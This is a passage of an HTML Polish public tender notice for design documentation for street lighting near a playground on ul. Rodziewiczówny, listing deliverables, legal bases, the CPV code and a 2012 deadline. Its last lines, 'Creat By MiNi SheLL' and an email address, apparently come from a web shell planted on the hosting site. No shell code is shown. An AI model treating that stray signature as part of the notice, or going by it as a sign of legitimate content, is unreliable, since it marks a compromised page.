Prawomocnych decyzjach lokalizacji inwestycji celu publicznego lub zapisach miejscowego planu zagospodarowania przestrzennego,
Opiniach ZUD
Prawie Budowlanym,
Prawie Energetycznym,
Ustawie o drogach publicznych 
Rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego
	zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. 202 poz. 2072 z  2 września 2004 r  z póź. zm.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Doświetlenie ul. Miłej oraz ul. Rodziewiczówny przy placu zabaw - zad 8/12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w ramach zadania wykonanie projektu budowlano- wykonawczego dla  Doświetlenie ul. Rodziewiczówny przy placu zabaw, w zakresie: 
I etap -  przedstawienie projektu koncepcyjnego do akceptacji Zamawiającego,
II etap - wykonanie na podstawie zaakceptowanej przez Zamawiającego koncepcji projektu budowlano - wykonawczego Doświetlenie ul. Rodziewiczówny przy placu zabaw, zawierających:
a)	plan zagospodarowania terenu w skali 1:500,
b)	mapę do celów projektowych z zaznaczonymi granicami działek,
c)	przygotowanie materiałów i uzyskanie uzgodnień  niezbędnych do wystąpienia o decyzję lokalizacji inwestycji celu publicznego,
d)	projekty budowlano - wykonawcze Doświetlenia ul. Rodziewiczówny przy placu zabaw, - po 5 egz. wraz z wersją elektroniczną.
e)	inwentaryzację zieleni wraz z wykazem drzew przewidzianych do wycinki
f)	przygotowanie materiałów i uzyskanie uzgodnień  niezbędnych do wystąpienia o zgodę na realizację inwestycji,  
g)	uzgodnienia tras i lokalizacji w ZUD.
h)	przedmiary robót -5 egz. wraz z wersją elektroniczną.
i)	kosztorysy inwestorskie -2 egz. wraz z wersją elektroniczną.
j)	specyfikację techniczną wykonania i odbioru robót - 5 egz. wraz z wersją elektroniczną.
k)	Informację BIOZ - 4 egz.
l)	uzgodnienia z odpowiednimi instytucjami 
Zakres projektów budowlano - wykonawczych  powinien zawierać wytyczne i zalecenia zawarte w:
Prawomocnych decyzjach lokalizacji inwestycji celu publicznego lub zapisach miejscowego planu zagospodarowania przestrzennego,
Opiniach ZUD
Prawie Budowlanym,
Prawie Energetycznym,
Ustawie o drogach publicznych 
Rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego
zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. 202 poz. 2072 z  2 września 2004 r  z póź. zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com